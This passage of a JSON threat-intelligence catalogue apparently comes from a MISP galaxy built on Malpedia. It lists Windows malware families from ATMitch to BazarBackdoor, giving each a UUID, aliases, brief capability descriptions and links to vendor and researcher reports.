"https://documents.trendmicro.com/assets/white_papers/wp-cashing-in-on-atm-malware.pdf", "https://securelist.com/atm-pos-malware-landscape-2017-2019/96750/" ], "synonyms": [], "type": [] }, "uuid": "5f427b3a-7162-4421-b2cd-e6588d518448", "value": "ATMitch" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmosphere", "https://www.zdnet.com/article/new-silence-hacking-group-suspected-of-having-ties-to-cyber-security-industry/", "https://www.group-ib.com/resources/threat-research/silence.html" ], "synonyms": [], "type": [] }, "uuid": "15918921-93b8-4b3a-a612-e1d1f769c420", "value": "Atmosphere" }, { "description": "The ATMSpitter family consists of command-line tools designed to control the cash dispenser of an ATM through function calls to either CSCWCNG.dll or MFSXFS.dll.\r\nBoth libraries are legitimate Windows drivers used to interact with the components of different ATM models.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.atmspitter", "https://quoscient.io/reports/QuoINT_INTBRI_New_ATMSpitter.pdf", "http://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://www.secureworks.com/research/threat-profiles/gold-kingswood", "https://quoscient.io/reports/QuoINT_INTBRI_ATMSpitter_v2.pdf" ], "synonyms": [], "type": [] }, "uuid": "5a03a6ff-e127-4cd2-aab1-75f1e3ecc187", "value": "ATMSpitter" }, { "description": "Attor is a cyberespionage platform used in targeted attacks against diplomatic missions and governmental institutions since at least 2013. Its most interesting features are a complex modular architecture, elaborate network communications, and a unique plugin to fingerprint GSM/GPRS devices.\r\n\r\nAttor’s core lies in its dispatcher, which serves as a management unit for additional plugins which provide all of malware’s key capabilities. This allows the attackers to customize the platform on a per-victim basis. Plugins themselves are heavily synchronized. Network communication is based on Tor, aiming for anonymity and untraceability. \r\n\r\nThe most notable plugin can detect connected GSM/GPRS modems or mobile devices. Attor speaks to them directly using the AT command set, in order to collect sensitive information such as the IMEI, IMSI or MSISDN numbers, possibly identifying both the device and its subscriber. Other plugins provide persistence, an exfiltration channel, C&C communication and several further spying capabilities. The plugin responsible for capturing victim's screen targets social networks and blogging platforms, email services, office software, archiving utilities, file sharing and messaging services.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.attor", "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform", "https://safe.cnews.ru/news/top/2019-10-11_za_rossijskimi_diplomatami", "https://threatpost.com/sophisticated-spy-kit-russians-gsm-plugin/149095/", "https://www.unian.ua/science/10717107-mizhnarodna-it-kompaniya-poperedzhaye-pro-nizku-shpigunskih-atak-na-uryadovi-ta-diplomatichni-ustanovi-shidnoji-yevropi.html", "https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Attor.pdf", "https://www.welivesecurity.com/2019/10/10/eset-discovers-attor-spy-platform/", "https://www.zdnet.com/article/new-espionage-malware-found-targeting-russian-speaking-users-in-eastern-europe/" ], "synonyms": [], "type": [] }, "uuid": "f5f61bc0-aad2-4da3-83db-703ea516c03b", "value": "Attor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.august_stealer", "https://www.proofpoint.com/us/threat-insight/post/august-in-december-new-information-stealer-hits-the-scene", "https://hazmalware.blogspot.de/2016/12/analysis-of-august-stealer-malware.html" ], "synonyms": [], "type": [] }, "uuid": "2ee0122a-701d-487d-9ac1-7d91e4f99d78", "value": "August Stealer" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.auriga", "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" ], "synonyms": [ "Riodrv" ], "type": [] }, "uuid": "e3065e43-503b-4496-921b-7601dd3d6abd", "value": "Auriga" }, { "description": "Ransomware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aurora", "https://twitter.com/malwrhunterteam/status/1001461507513880576", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", "https://www.bleepingcomputer.com/ransomware/decryptor/how-to-decrypt-the-aurora-ransomware-with-auroradecrypter/" ], "synonyms": [ "OneKeyLocker" ], "type": [] }, "uuid": "2f899e3e-1a46-43ea-8e68-140603ce943d", "value": "Aurora" }, { "description": "Avaddon is a ransomware malware targeting Windows systems often spread via malicious spam. The first known attack where Avaddon ransomware was distributed was in February 2020. Avaddon encrypts files using the extension .avdn and uses a TOR payment site for the ransom payment.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avaddon", "https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/", "https://twitter.com/Securityinbits/status/1271065316903120902", "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://awakesecurity.com/blog/threat-hunting-for-avaddon-ransomware/", "https://www.swascan.com/it/avaddon-ransomware/", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://arxiv.org/pdf/2102.04796.pdf", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/ransomware-report-avaddon-and-new-techniques-emerge-industrial-sector-targeted", "https://www.hornetsecurity.com/en/security-information/avaddon-from-seeking-affiliates-to-in-the-wild-in-2-days/", "https://twitter.com/dk_samper/status/1348560784285167617", "https://threatconnect.com/blog/threatconnect-research-roundup-probable-sandworm-infrastructure", "https://www.tgsoft.it/files/report/download.asp?id=568531345", "https://www.bleepingcomputer.com/news/security/another-ransomware-now-uses-ddos-attacks-to-force-victims-to-pay/" ], "synonyms": [], "type": [] }, "uuid": "8f648193-68ca-40c2-98b2-e5481487463e", "value": "Avaddon Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avast_disabler", "https://securityintelligence.com/exposing-av-disabling-drivers-just-in-time-for-lunch/" ], "synonyms": [], "type": [] }, "uuid": "96a695de-2560-4f10-bbd6-3bc2ac27b7f7", "value": "AvastDisabler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avcrypt", "https://www.bleepingcomputer.com/news/security/the-avcrypt-ransomware-tries-to-uninstall-your-av-software/" ], "synonyms": [], "type": [] }, "uuid": "0568fcc6-755f-416e-9c5b-22232cd7ae0e", "value": "AVCrypt" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aveo", "https://www.secureworks.com/research/threat-profiles/bronze-overbrook", "http://researchcenter.paloaltonetworks.com/2016/08/unit42-aveo-malware-family-targets-japanese-speaking-users/" ], "synonyms": [], "type": [] }, "uuid": "606b160a-5180-4255-a1db-b2b9e8a52e95", "value": "Aveo" }, { "description": "Information stealer which uses AutoIT for wrapping.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.kaspersky.com/about/press-releases/2019_fin7-hacking-group-targets-more-than-130-companies-after-leaders-arrest", "https://www.uptycs.com/blog/warzone-rat-comes-with-uac-bypass-technique", "https://blog.team-cymru.com/2019/07/25/unmasking-ave_maria/", "https://securelist.com/apt-trends-report-q3-2020/99204/", "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://medium.com/insomniacs/do-you-want-to-bake-a-donut-come-on-lets-go-update-go-away-maria-e8e2b33683b1", "https://reaqta.com/2019/04/ave_maria-malware-part1/", "https://research.checkpoint.com/2020/warzone-behind-the-enemy-lines/", "https://mp.weixin.qq.com/s/C09P0al1nhsyyujHRp0FAw", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "http://blog.morphisec.com/threat-alert-ave-maria-infostealer-on-the-rise-with-new-stealthier-delivery", "https://www.youtube.com/watch?v=T0tdj1WDioM", "https://blog.yoroi.company/research/the-ave_maria-malware/", "https://blog.talosintelligence.com/2020/09/salfram-robbing-place-without-removing.html", "https://securelist.com/fin7-5-the-infamous-cybercrime-rig-fin7-continues-its-activities/90703/", "https://www.uptycs.com/blog/confucius-apt-deploys-warzone-rat", "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html", "https://mp.weixin.qq.com/s/fsesosMnKIfAi_I9I0wKSA" ], "synonyms": [ "AVE_MARIA", "AveMariaRAT", "Warzone RAT", "avemaria" ], "type": [] }, "uuid": "6bae792a-c2d0-42eb-b9e0-6ef1d83f9b25", "value": "Ave Maria" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.avzhan", "https://blog.malwarebytes.com/threat-analysis/2018/02/avzhan-ddos-bot-dropped-by-chinese-drive-by-attack/" ], "synonyms": [], "type": [] }, "uuid": "b12d9354-f67b-47dd-944c-82cfdff7b9a3", "value": "Avzhan" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.ayegent" ], "synonyms": [], "type": [] }, "uuid": "c84a6b0b-28a5-4293-b8fc-6a6eeb7b5f70", "value": "Ayegent" }, { "description": "AZORult is a credential and payment card information stealer. Among other things, version 2 added support for .bit-domains. It has been observed in conjunction with Chthonic as well as being dropped by Ramnit.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.azorult", "https://blog.360totalsecurity.com/en/bayworld-event-cyber-attack-against-foreign-trade-industry/", "https://blog.team-cymru.com/2020/02/19/azorult-what-we-see-using-our-own-tools/", "https://medium.com/s2wlab/w1-feb-en-story-of-the-week-stealers-on-the-darkweb-49945a31601d", "https://medium.com/s2wlab/operation-synctrek-e5013df8d167", "https://mariohenkel.medium.com/decrypting-azorult-traffic-for-fun-and-profit-9f28d8638b05", "https://research.checkpoint.com/2019/select-code_execution-from-using-sqlite/", "https://umbrella.cisco.com/blog/navigating-cybersecurity-during-a-pandemic-latest-malware-and-threat-actors", "https://blog.talosintelligence.com/2020/04/azorult-brings-friends-to-party.html", "https://www.vmray.com/cyber-security-blog/azorult-delivered-by-guloader-malware-analysis-spotlight/", "https://www.proofpoint.com/us/threat-insight/post/new-whiteshadow-downloader-uses-microsoft-sql-retrieve-malware", "https://isc.sans.edu/diary/25120", "https://blog.talosintelligence.com/2020/06/tor2mine-is-up-to-their-old-tricks-and_11.html", "https://www.youtube.com/watch?v=EyDiIAt__dI", "https://fr3d.hk/blog/gazorp-thieving-from-thieves", "https://www.bleepingcomputer.com/news/security/azorult-trojan-serving-aurora-ransomware-by-malactor-oktropys/", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://malwarebreakdown.com/2017/07/24/the-seamless-campaign-drops-ramnit-follow-up-malware-azorult-stealer-smoke-loader-etc/", "https://blog.nviso.eu/2020/09/01/epic-manchego-atypical-maldoc-delivery-brings-flurry-of-infostealers/", "https://twitter.com/DrStache_/status/1227662001247268864", "https://blog.yoroi.company/research/aggah-how-to-run-a-botnet-without-renting-a-server-for-more-than-a-year/", "https://malwarebreakdown.com/2017/11/12/seamless-campaign-delivers-ramnit-via-rig-ek-at-188-225-82-158-follow-up-malware-is-azorult-stealer/", "https://resources.malwarebytes.com/files/2020/05/CTNT_Q1_2020_COVID-Report_Final.pdf", "https://research.checkpoint.com/the-emergence-of-the-new-azorult-3-3/", "https://unit42.paloaltonetworks.com/cybersquatting/", "https://threatvector.cylance.com/en_us/home/threat-spotlight-analyzing-azorult-infostealer-malware.html", "https://blog.minerva-labs.com/puffstealer-evasion-in-a-cloak-of-multiple-layers", "https://www.proofpoint.com/us/threat-insight/post/threat-actors-using-legitimate-paypal-accounts-to-distribute-chthonic-banking-trojan", "https://www.zscaler.com/blogs/research/multistage-freedom-loader-used-spread-azorult-and-nanocore-rat", "https://securelist.com/azorult-analysis-history/89922/", "https://ke-la.com/exploring-the-genesis-supply-chain-for-fun-and-profit/", "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf", "https://www.blueliv.com/blog-news/research/azorult-crydbrox-stops-sells-malware-credential-stealer/", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672", "https://www.zscaler.com/blogs/security-research/targeted-attacks-oil-and-gas-supply-chain-industries-middle-east", "https://blog.prevailion.com/2020/02/the-triune-threat-mastermana-returns.html", "https://www.cybereason.com/blog/the-hole-in-the-bucket-attackers-abuse-bitbucket-to-deliver-an-arsenal-of-malware", "https://blogs.blackberry.com/en/2020/04/threat-spotlight-gootkit-banking-trojan", "https://www.domaintools.com/resources/blog/identifying-network-infrastructure-related-to-a-who-spoofing-campaign", "http://www.vkremez.com/2017/07/lets-learn-reversing-credential-and.html", "https://maxkersten.nl/binary-analysis-course/malware-analysis/azorult-loader-stages/", "https://blog.minerva-labs.com/azorult-now-as-a-signed-google-update", "https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/", "https://isc.sans.edu/forums/diary/Analysis+of+a+tripleencrypted+AZORult+downloader/25768/", "https://www.proofpoint.com/us/threat-insight/post/new-version-azorult-stealer-improves-loading-features-spreads-alongside" ], "synonyms": [ "PuffStealer", "Rultazo" ], "type": [] }, "uuid": "0dfbe48e-a3da-4265-975e-1eb37ad9c51c", "value": "Azorult" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babar", "http://www.spiegel.de/media/media-35683.pdf", "https://web.archive.org/web/20150218192803/http://www.cyphort.com/babar-suspected-nation-state-spyware-spotlight/", "https://drive.google.com/a/cyphort.com/file/d/0B9Mrr-en8FX4dzJqLWhDblhseTA/", "https://researchcenter.paloaltonetworks.com/2017/09/unit42-analysing-10-year-old-snowball/", "https://www.gdatasoftware.com/blog/2015/02/24270-babar-espionage-software-finally-found-and-put-under-the-microscope" ], "synonyms": [ "SNOWBALL" ], "type": [] }, "uuid": "947dffa1-0184-48d4-998e-1899ad97e93e", "value": "Babar" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babuk", "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-babuk-ransomware.pdf", "https://www.bleepingcomputer.com/news/security/babyk-ransomware-wont-hit-charities-unless-they-support-lgbt-blm/", "https://sebdraven.medium.com/babuk-is-distributed-packed-78e2f5dd2e62", "https://twitter.com/Sebdraven/status/1346377590525845504", "http://chuongdong.com/reverse%20engineering/2021/01/03/BabukRansomware/", "https://medium.com/s2wlab/w4-jan-en-story-of-the-week-ransomware-on-the-darkweb-7595544363b1", "https://www.trendmicro.com/en_us/research/21/b/new-in-ransomware.html" ], "synonyms": [ "Babyk Ransomware", "Vasa Locker" ], "type": [] }, "uuid": "3e243686-a0a0-4aff-b149-786cc3f99a84", "value": "Babuk Ransomware" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babylon_rat", "https://twitter.com/KorbenD_Intel/status/1110654679980085262" ], "synonyms": [], "type": [] }, "uuid": "1a196c09-f7cd-4a6e-bc3c-2489121b5381", "value": "BabyLon RAT" }, { "description": "BABYMETAL is a command line network tunnel utility based on the TinyMet Meterpreter tool, primarily used to execute Meterpreter reverse shell payloads.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babymetal", "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf", "https://www.infosecurityeurope.com/__novadocuments/367989?v=636338290033030000", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], "type": [] }, "uuid": "30c2e5c6-851d-4f3a-8b6e-2e7b69a26467", "value": "BABYMETAL" }, { "description": "BabyShark is Microsoft Visual Basic (VB) script-based malware family first seen in November 2018. The malware is launched by executing the first stage HTA from a remote location, thus it can be delivered via different file types including PE files as well as malicious documents. It exfiltrates system information to C2 server, maintains persistence on the system, and waits for further instruction from the operator", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.babyshark", "https://www.cybereason.com/blog/back-to-the-future-inside-the-kimsuky-kgh-spyware-suite", "https://blog.alyac.co.kr/3352", "https://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://us-cert.cisa.gov/ncas/alerts/aa20-301a", "https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/", "https://twitter.com/i/web/status/1099147896950185985", "https://www.bloomberglaw.com/document/public/subdoc/X67FPNDOUBV9VOPS35A4864BFIU?imagename=1", "https://www.pwc.co.uk/issues/cyber-security-services/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-1.htmlhttps://www.pwc.co.uk/issues/cyber-security-data-privacy/research/tracking-kimsuky-north-korea-based-cyber-espionage-group-part-2.html" ], "synonyms": [], "type": [] }, "uuid": "8abdd40c-d79a-4353-80e3-29f8a4229a37", "value": "BabyShark" }, { "description": "FireEye describes BACKBEND as a secondary downloader used as a backup mechanism in the case the primary backdoor is removed. When executed, BACKBEND checks for the presence of the mutexes MicrosoftZj or MicrosoftZjBak (both associated with BACKSPACE variants). If either of the mutexes exist, the malware exits.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backbend", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [], "type": [] }, "uuid": "934da8b2-f66e-4056-911e-1da09216e8b8", "value": "BACKBEND" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backnet", "https://github.com/valsov/BackNet" ], "synonyms": [], "type": [] }, "uuid": "e2840cc1-c43d-4542-9818-a3c15a0f9f7a", "value": "BackNet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backoff", "https://securelist.com/sinkholing-the-backoff-pos-trojan/66305/" ], "synonyms": [], "type": [] }, "uuid": "70f68c8c-4dc5-4bb0-9f4d-a7484561574b", "value": "Backoff POS" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backspace", "https://www.secureworks.com/research/threat-profiles/bronze-geneva", "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/eagle-eye-is-back-apt30/", "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf" ], "synonyms": [ "Lecna", "ZRLnk" ], "type": [] }, "uuid": "23398248-a52a-4a7c-af10-262822d33a4e", "value": "backspace" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap", "https://securityintelligence.com/backswap-malware-now-targets-six-banks-in-spain/", "https://www.f5.com/labs/articles/threat-intelligence/backswap-defrauds-online-banking-customers-using-hidden-input-fi", "https://www.cert.pl/en/news/single/backswap-malware-analysis/", "https://research.checkpoint.com/the-evolution-of-backswap/", "https://www.cyberbit.com/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", "https://www.cyberbit.com/blog/endpoint-security/backswap-banker-malware-hides-inside-replicas-of-legitimate-programs/", "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf", "https://www.welivesecurity.com/2018/05/25/backswap-malware-empty-bank-accounts/" ], "synonyms": [], "type": [] }, "uuid": "4ec40af9-0295-4b9a-81ad-b7017a21609d", "value": "BackSwap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badcall", "https://www.us-cert.gov/ncas/analysis-reports/ar19-252a", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf" ], "synonyms": [], "type": [] }, "uuid": "9ddf546b-487f-44e4-b0dd-07e9997c86c6", "value": "BADCALL (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badencript", "https://twitter.com/PhysicalDrive0/status/833067081981710336" ], "synonyms": [], "type": [] }, "uuid": "af1c99be-e55a-473e-abed-726191e1da05", "value": "BadEncript" }, { "description": "BADFLICK, a backdoor that is capable of modifying the file system, generating a reverse shell, and modifying its command-and-control configuration.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick", "https://www.fireeye.com/blog/threat-research/2018/03/suspected-chinese-espionage-group-targeting-maritime-and-engineering-industries.html", "https://blog.amossys.fr/badflick-is-not-so-bad.html" ], "synonyms": [], "type": [] }, "uuid": "1eceb5c0-3a01-43c2-b204-9957b15cf763", "value": "badflick" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.badnews", "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-1", "https://documents.trendmicro.com/assets/tech-brief-untangling-the-patchwork-cyberespionage-group.pdf", "http://blog.fortinet.com/2017/04/05/in-depth-look-at-new-variant-of-monsoon-apt-backdoor-part-2", "https://ti.qianxin.com/blog/articles/apt-c-09-reappeared-as-conflict-intensified-between-india-and-pakistan/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf", "https://www.forcepoint.com/sites/default/files/resources/files/forcepoint-security-labs-monsoon-analysis-report.pdf", "https://researchcenter.paloaltonetworks.com/2018/03/unit42-patchwork-continues-deliver-badnews-indian-subcontinent/", "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-LunghiHorejsi.pdf", "https://www.forcepoint.com/blog/x-labs/monsoon-analysis-apt-campaign", "https://lab52.io/blog/new-patchwork-campaign-against-pakistan/" ], "synonyms": [], "type": [] }, "uuid": "f28fa5ca-9466-410c-aa32-4bd102f3f0e1", "value": "BadNews" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bagle" ], "synonyms": [], "type": [] }, "uuid": "f09af1cc-cf9d-499a-9026-e783a3897508", "value": "Bagle" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bahamut", "https://www.bellingcat.com/news/mena/2017/06/12/bahamut-pursuing-cyber-espionage-actor-middle-east/", "https://www.blackberry.com/us/en/pdfviewer?file=/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-spark-bahamut.pdf", "https://www.bellingcat.com/resources/case-studies/2017/10/27/bahamut-revisited-cyber-espionage-middle-east-south-asia/" ], "synonyms": [], "type": [] }, "uuid": "b420eb9f-d526-473c-95ab-5ab380bbec72", "value": "Bahamut (Windows)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.baldr", "https://www.sophos.com/en-us/medialibrary/PDFs/technical-papers/baldr-vs-the-world.pdf", "https://krabsonsecurity.com/2019/06/04/taking-a-look-at-baldr-stealer/", "https://blog.malwarebytes.com/threat-analysis/2019/04/say-hello-baldr-new-stealer-market/", "https://www.youtube.com/watch?v=E2V4kB_gtcQ" ], "synonyms": [ "Baldir" ], "type": [] }, "uuid": "7024893a-96fe-4de4-bb04-c1d4794a4c95", "value": "Baldr" }, { "description": "According to ESET, BalkanDoor is a simple backdoor with a small number of commands (download and execute a file, create a remote shell, take a screenshot). It can be used to automate tasks on the compromised computer or to automatically control several affected computers at once. We have seen six versions of the backdoor, with a range of supported commands, evolve since 2016.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_door", "https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/" ], "synonyms": [], "type": [] }, "uuid": "22d61347-4d89-41e7-89dc-95b1f370522d", "value": "BalkanDoor" }, { "description": "The goal of BalkanRAT which is a more complex part of the malicious Balkan-toolset (cf. BalkanDoor) is to deploy and leverage legitimate commercial software for remote administration. The malware has several additional components to help load, install and conceal the existence of the remote desktop software. A single long-term campaign involving BalkanRAT has been active at least from January 2016 and targeted accouting departments of organizations in Croatia, Serbia, Montenegro, and Bosnia and Herzegovina (considered that the contents of the emails, included links and decoy PDFs all were involving taxes). It was legitimaly signed and installed by an exploit of the WinRAR ACE vulnerability (CVE-2018-20250). ", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.balkan_rat", "https://www.welivesecurity.com/2019/08/14/balkans-businesses-double-barreled-weapon/" ], "synonyms": [], "type": [] }, "uuid": "d7b40333-a2ce-423d-9052-51b09bf18bb3", "value": "BalkanRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bamital", "https://blogs.microsoft.com/blog/2013/02/22/bamital-botnet-takedown-is-successful-cleanup-underway/", "https://www.symantec.com/content/dam/symantec/docs/security-center/white-papers/trojan-bamital-13-en.pdf" ], "synonyms": [], "type": [] }, "uuid": "f355f41b-a6b2-48b7-9c5c-da99a41cb1ad", "value": "Bamital" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banatrix", "https://www.cert.pl/en/news/single/banatrix-an-indepth-look/" ], "synonyms": [], "type": [] }, "uuid": "721fe429-f240-4fd6-a5c9-187195624b51", "value": "Banatrix" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bancos", "https://www.fireeye.com/blog/threat-research/2009/03/bancos-a-brazilian-crook.html" ], "synonyms": [], "type": [] }, "uuid": "a2ee2f24-ead8-4415-b777-7190478a620c", "value": "bancos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bandook", "https://twitter.com/malwrhunterteam/status/796425285197561856", "https://research.checkpoint.com/2020/bandook-signed-delivered/", "https://www.eff.org/deeplinks/2020/12/dark-caracal-you-missed-spot", "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf", "https://www.eff.org/files/2018/01/29/operation-manul.pdf" ], "synonyms": [ "Bandok" ], "type": [] }, "uuid": "3144e23d-6e3e-47e6-8f0e-a47be25d1041", "value": "Bandook" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bangat", "https://www.slideshare.net/YuryChemerkin/appendix-c-digital-the-malware-arsenal" ], "synonyms": [], "type": [] }, "uuid": "5c3c53ff-c81f-4daa-9b60-672650046ed7", "value": "bangat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.banjori", "http://blog.kleissner.org/?p=69", "http://osint.bambenekconsulting.com/feeds/", "https://www.johannesbader.ch/2015/02/the-dga-of-banjori/", "http://blog.kleissner.org/?p=192" ], "synonyms": [ "BackPatcher", "BankPatch", "MultiBanker 2" ], "type": [] }, "uuid": "137cde28-5c53-489b-ad0b-d0fa2e342324", "value": "Banjori" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bankshot", "https://us-cert.cisa.gov/ncas/analysis-reports/ar20-232a", "https://www.secureworks.com/research/threat-profiles/nickel-gladstone", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.us-cert.gov/sites/default/files/publications/MAR-10135536-B_WHITE.PDF", "https://www.us-cert.gov/ncas/analysis-reports/ar20-133a", "https://blog.lexfo.fr/ressources/Lexfo-WhitePaper-The_Lazarus_Constellation.pdf", "https://blog.reversinglabs.com/blog/hidden-cobra" ], "synonyms": [ "COPPERHEDGE" ], "type": [] }, "uuid": "bc67677c-c0e7-4fb1-8619-7f43fa3ff886", "value": "Bankshot" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.barkiofork", "https://www.symantec.com/connect/blogs/backdoorbarkiofork-targets-aerospace-and-defense-industry" ], "synonyms": [], "type": [] }, "uuid": "d2cdaceb-7810-4c80-9a69-0a6f27832725", "value": "barkiofork" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bart", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf", "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/" ], "synonyms": [], "type": [] }, "uuid": "1dfd3ba6-7f82-407f-958d-c4a2ac055123", "value": "Bart" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batchwiper", "http://contagiodump.blogspot.com/2012/12/batchwiper-samples.html" ], "synonyms": [], "type": [] }, "uuid": "b74747e0-59ac-4adf-baac-78213a234ff5", "value": "BatchWiper" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.batel", "https://web.archive.org/web/20161223002016/https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks" ], "synonyms": [], "type": [] }, "uuid": "3900aa45-a7ff-48cc-9ac0-58c7c372991e", "value": "Batel" }, { "description": "BazarBackdoor is a small backdoor, probably by a TrickBot \"spin-off\" like anchor. Its called team9 backdoor (and the corresponding loader: team9 restart loader).\r\n\r\nFor now, it exclusively uses Emercoin domains (.bazar), thus the naming. FireEye uses KEGTAP as name for BazarLoader and BEERBOT for BazarBackdoor.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.bazarbackdoor", 